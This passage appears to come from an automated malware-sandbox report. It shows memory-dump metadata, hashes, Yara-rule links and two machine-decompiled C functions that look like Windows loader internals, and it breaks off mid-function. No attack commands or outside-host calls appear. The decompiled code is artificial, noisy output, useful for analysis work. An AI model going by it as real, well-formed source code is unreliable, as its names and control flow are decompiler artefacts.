                                                        0x00000000
                                                        0x047f41c3
                                                        0x047f41bd
                                                        0x047f4415
                                                        0x047f4415
                                                        0x047f4416
                                                        0x047f4417
                                                        0x047f4429
                                                        0x047f416e
                                                        0x047f416e
                                                        0x047f4175
                                                        0x047f4498
                                                        0x047f449f
                                                        0x0483e12d
                                                        0x00000000
                                                        0x0483e133
                                                        0x00000000
                                                        0x0483e133
                                                        0x047f44a5
                                                        0x047f44a5
                                                        0x047f44aa
                                                        0x00000000
                                                        0x047f44bb
                                                        0x047f44ca
                                                        0x047f44d6
                                                        0x047f44d7
                                                        0x047f44d8
                                                        0x047f44e3
                                                        0x047f44e3
                                                        0x047f44aa
                                                        0x047f417b
                                                        0x047f417b
                                                        0x047f417b
                                                        0x00000000
                                                        0x047f417b
                                                        0x047f4175
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a67b3cf628b35807abc9449b8cbd6c3728213224c41a93dad6caa9e505151ce1
                                                        • Instruction ID: 289fc271518799438c57ca6e4d8cfed06503ad2f4ddbc04ae8aefe967e8d674c
                                                        • Opcode Fuzzy Hash: a67b3cf628b35807abc9449b8cbd6c3728213224c41a93dad6caa9e505151ce1
                                                        • Instruction Fuzzy Hash: 1BF18E706082118BD724CF59C884A3BB7E1FF98719F044A2EF996DB350E734E985DB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048020A0, Relevance: .4, Instructions: 420COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E048020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x48c8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04802EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04802EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E047D58EC(_t240);
									_t221 =  *0x48c5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x48c5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04814A2C(0x48c6e40, 0x4814b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E047F7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x47b5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0480F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0480F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04857016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L047F2400(_t267 + 0x20);
															}
															L047F2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04802397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E047F2280(_t134, 0x48c8608);
									__eflags =  *0x48c6e48 - _t253; // 0x6690e8
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E047EFFB0(_t198, _t241, 0x48c8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x48c6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x48c8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04806B90(_t210,  &_v64);
										_t262 =  *0x48c8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0480E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E048197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0481006A(0x48c8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x48c8608);
												E0481B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x48c6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x48c6e48; // 0x6690e8
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E047EFFB0(_t198, _t240, 0x48c8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E048100C2(0x48c8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x8
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                        0x048020a0
                                                        0x048020a8
                                                        0x048020ad
                                                        0x048020b3
                                                        0x048020b8
                                                        0x048020c2
                                                        0x048020c7
                                                        0x048020cb
                                                        0x048020d2
                                                        0x04802263
                                                        0x04802266
                                                        0x04845836
                                                        0x04845836
                                                        0x00000000
                                                        0x0480226c
                                                        0x0480226c
                                                        0x04802270
                                                        0x04802274
                                                        0x048020e2
                                                        0x048020e2
                                                        0x048020e6
                                                        0x048020ee
                                                        0x048457dc
                                                        0x048457de
                                                        0x048457ec
                                                        0x048457ec
                                                        0x048457f1
                                                        0x048457f3
                                                        0x048457f8
                                                        0x00000000
                                                        0x048457f8
                                                        0x048457e0
                                                        0x048457e4
                                                        0x048457ea
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048457ea
                                                        0x048020f4
                                                        0x048020f4
                                                        0x048020f8
                                                        0x048020f8
                                                        0x048020fc
                                                        0x04802100
                                                        0x04802106
                                                        0x04802201
                                                        0x04802206
                                                        0x0480220b
                                                        0x0480220e
                                                        0x048022a9
                                                        0x048022ac
                                                        0x00000000
                                                        0x00000000
                                                        0x048022b2
                                                        0x048022b5
                                                        0x04845801
                                                        0x04845806
                                                        0x00000000
                                                        0x00000000
                                                        0x04845810
                                                        0x04845815
                                                        0x04845818
                                                        0x00000000
                                                        0x00000000
                                                        0x0484581e
                                                        0x048022bb
                                                        0x048022bb
                                                        0x04802218
                                                        0x04802218
                                                        0x0480221c
                                                        0x04802220
                                                        0x04802222
                                                        0x048022c2
                                                        0x048022c4
                                                        0x048022dc
                                                        0x048022dc
                                                        0x048022e1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048022e7
                                                        0x048022c8
                                                        0x048022cd
                                                        0x048022d3
                                                        0x048022d6
                                                        0x04845823
                                                        0x04845825
                                                        0x04845827
                                                        0x00000000
                                                        0x00000000
                                                        0x0484582d
                                                        0x00000000
                                                        0x0484582d
                                                        0x00000000
                                                        0x04802228
                                                        0x04802228
                                                        0x00000000
                                                        0x04802228
                                                        0x04802222
                                                        0x04802214
                                                        0x04802214
                                                        0x00000000
                                                        0x04802114
                                                        0x04802114
                                                        0x04802114
                                                        0x0480211a
                                                        0x0480211c
                                                        0x04802348
                                                        0x0480234d
                                                        0x04845840
                                                        0x04845845
                                                        0x04845848
                                                        0x0484584e
                                                        0x0484584e
                                                        0x04845848
                                                        0x04802353
                                                        0x04802355
                                                        0x04802388
                                                        0x04802388
                                                        0x04802368
                                                        0x0480236a
                                                        0x0480236c
                                                        0x0480238f
                                                        0x00000000
                                                        0x0480236e
                                                        0x0480236e
                                                        0x0480218e
                                                        0x0480218e
                                                        0x04802191
                                                        0x04802195
                                                        0x04845a03
                                                        0x04845a06
                                                        0x04845a0c
                                                        0x04845a0f
                                                        0x04845a11
                                                        0x04845a13
                                                        0x04845a13
                                                        0x04845a19
                                                        0x04845a1f
                                                        0x00000000
                                                        0x0480219b
                                                        0x0480219b
                                                        0x048021a0
                                                        0x04802282
                                                        0x04802284
                                                        0x04802284
                                                        0x04802284
                                                        0x04802284
                                                        0x048021a6
                                                        0x048021a9
                                                        0x048021ac
                                                        0x048021ae
                                                        0x048021b3
                                                        0x0480228b
                                                        0x04802290
                                                        0x04802379
                                                        0x04802296
                                                        0x04802298
                                                        0x04802298
                                                        0x04802290
                                                        0x048021b9
                                                        0x048021be
                                                        0x048022a2
                                                        0x048022a2
                                                        0x048021c4
                                                        0x048021c8
                                                        0x048021cc
                                                        0x048021d0
                                                        0x048021d4
                                                        0x048021de
                                                        0x048021e3
                                                        0x04845a29
                                                        0x04845a2c
                                                        0x00000000
                                                        0x00000000
                                                        0x04845a3b
                                                        0x00000000
                                                        0x048021e9
                                                        0x048021e9
                                                        0x048021e9
                                                        0x048021ee
                                                        0x048021f1
                                                        0x04845a45
                                                        0x04845a4b
                                                        0x04845a52
                                                        0x04845a58
                                                        0x04845a5d
                                                        0x04845a5f
                                                        0x04845a71
                                                        0x04845a61
                                                        0x04845a6a
                                                        0x04845a6a
                                                        0x04845a76
                                                        0x04845a79
                                                        0x04845a7f
                                                        0x04845a83
                                                        0x04845a85
                                                        0x04845a87
                                                        0x04845a87
                                                        0x04845a8c
                                                        0x04845a91
                                                        0x04845a97
                                                        0x04845a9f
                                                        0x04845aa0
                                                        0x04845aa1
                                                        0x04845aa6
                                                        0x04845aab
                                                        0x04845ab1
                                                        0x04845ab3
                                                        0x04845ab9
                                                        0x04845aca
                                                        0x04845ad4
                                                        0x04845ad4
                                                        0x04845ade
                                                        0x04845ade
                                                        0x04845aab
                                                        0x04845a79
                                                        0x04845a52
                                                        0x048021f7
                                                        0x048021f9
                                                        0x048021fe
                                                        0x048021fe
                                                        0x048021e3
                                                        0x04802195
                                                        0x0480236c
                                                        0x04802122
                                                        0x04802122
                                                        0x04802124
                                                        0x04802231
                                                        0x04802236
                                                        0x04802236
                                                        0x04802238
                                                        0x04802238
                                                        0x04802240
                                                        0x04802242
                                                        0x04802244
                                                        0x048459fc
                                                        0x0480218c
                                                        0x0480218c
                                                        0x00000000
                                                        0x0480218c
                                                        0x0480224a
                                                        0x0480224f
                                                        0x04802256
                                                        0x04802304
                                                        0x04802309
                                                        0x0480230f
                                                        0x0480231e
                                                        0x0480231e
                                                        0x0480231e
                                                        0x04802320
                                                        0x04802325
                                                        0x0480232a
                                                        0x0480232c
                                                        0x0480233e
                                                        0x0480233e
                                                        0x00000000
                                                        0x0480232c
                                                        0x04802311
                                                        0x04802317
                                                        0x0480231a
                                                        0x0480231c
                                                        0x04802380
                                                        0x04802380
                                                        0x04802380
                                                        0x04802384
                                                        0x00000000
                                                        0x00000000
                                                        0x04802386
                                                        0x00000000
                                                        0x0480231c
                                                        0x0480225c
                                                        0x0480225c
                                                        0x00000000
                                                        0x0480225c
                                                        0x0480212a
                                                        0x04802134
                                                        0x04802138
                                                        0x0480213d
                                                        0x04845858
                                                        0x04845863
                                                        0x04845863
                                                        0x04845867
                                                        0x0484586a
                                                        0x00000000
                                                        0x00000000
                                                        0x0484586c
                                                        0x0484586c
                                                        0x04845871
                                                        0x04845875
                                                        0x04845877
                                                        0x04845997
                                                        0x0484599c
                                                        0x048459a1
                                                        0x048459a7
                                                        0x048459a7
                                                        0x00000000
                                                        0x048459a7
                                                        0x0484587d
                                                        0x00000000
                                                        0x0484588b
                                                        0x0484588b
                                                        0x04845890
                                                        0x04845892
                                                        0x04845894
                                                        0x04845899
                                                        0x0484589b
                                                        0x048458a0
                                                        0x048458a0
                                                        0x048458aa
                                                        0x048458b2
                                                        0x048458b6
                                                        0x048458be
                                                        0x048458c6
                                                        0x048458c9
                                                        0x0484590d
                                                        0x04845917
                                                        0x0484591a
                                                        0x0484591c
                                                        0x04845920
                                                        0x04845928
                                                        0x0484592a
                                                        0x0484592c
                                                        0x0484592e
                                                        0x0484592e
                                                        0x048458cb
                                                        0x048458cd
                                                        0x048458d8
                                                        0x048458e0
                                                        0x048458f4
                                                        0x048458fe
                                                        0x048458fe
                                                        0x0484593a
                                                        0x0484593e
                                                        0x04845940
                                                        0x04845942
                                                        0x00000000
                                                        0x04845944
                                                        0x04845944
                                                        0x04845949
                                                        0x0484594e
                                                        0x0484594e
                                                        0x04845953
                                                        0x0484595b
                                                        0x04845976
                                                        0x04845976
                                                        0x0484597a
                                                        0x0484597f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04845981
                                                        0x04845981
                                                        0x04845981
                                                        0x04845983
                                                        0x04845988
                                                        0x0484598d
                                                        0x04845991
                                                        0x04845991
                                                        0x00000000
                                                        0x0484595d
                                                        0x0484595d
                                                        0x04845963
                                                        0x04845965
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04845967
                                                        0x04845967
                                                        0x0484596b
                                                        0x0484596d
                                                        0x00000000
                                                        0x00000000
                                                        0x0484596f
                                                        0x04845971
                                                        0x04845971
                                                        0x04845974
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04845974
                                                        0x00000000
                                                        0x04845967
                                                        0x0484595b
                                                        0x04845942
                                                        0x04845863
                                                        0x04802143
                                                        0x04802143
                                                        0x04802149
                                                        0x0480214f
                                                        0x048022ec
                                                        0x048022f1
                                                        0x048022f6
                                                        0x00000000
                                                        0x048022f6
                                                        0x04802159
                                                        0x04802173
                                                        0x04802173
                                                        0x0480217d
                                                        0x04802181
                                                        0x04802186
                                                        0x048459ae
                                                        0x048459b2
                                                        0x048459b5
                                                        0x048459b7
                                                        0x048459ba
                                                        0x048459cd
                                                        0x048459d1
                                                        0x048459d5
                                                        0x048459d9
                                                        0x048459db
                                                        0x00000000
                                                        0x00000000
                                                        0x048459dd
                                                        0x048459dd
                                                        0x048459e1
                                                        0x048459e4
                                                        0x048459e7
                                                        0x048459ee
                                                        0x048459ee
                                                        0x048459f3
                                                        0x048459f3
                                                        0x00000000
                                                        0x04802186
                                                        0x04802164
                                                        0x0480216d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0480216d
                                                        0x04802106
                                                        0x04802266
                                                        0x048020d8
                                                        0x048020da
                                                        0x048020e0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8ebcfe87b9e76677c4a40b1040dda79f463f0d0cb457a0bdf9143c8d178365c
                                                        • Instruction ID: 78f8b7f26132ae58e9e655643a27cabd3e423a3a856f7ec6d08c26eb1599362e
                                                        • Opcode Fuzzy Hash: b8ebcfe87b9e76677c4a40b1040dda79f463f0d0cb457a0bdf9143c8d178365c
                                                        • Instruction Fuzzy Hash: 8DF1C0316183459FD765CE68C84872AB7E1AB85328F048F99E995DB290E7B4F841CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047ED5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E047ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x48cd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E047E6600(0x48c52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x48c7b9c; // 0x0
							_t281 = L047F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0481F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x48c7b90; // 0x772a0000
								if(_t384 == 0) {
									_t353 =  *0x48c7b8c; // 0x663db8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x663e68
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E047F2280(_t200, 0x48c84d8);
									_t277 =  *0x48c85f4; // 0x6622f8
									_t351 =  *0x48c85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x75f20000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x662340
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x662290
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x662340
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x661ff0
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
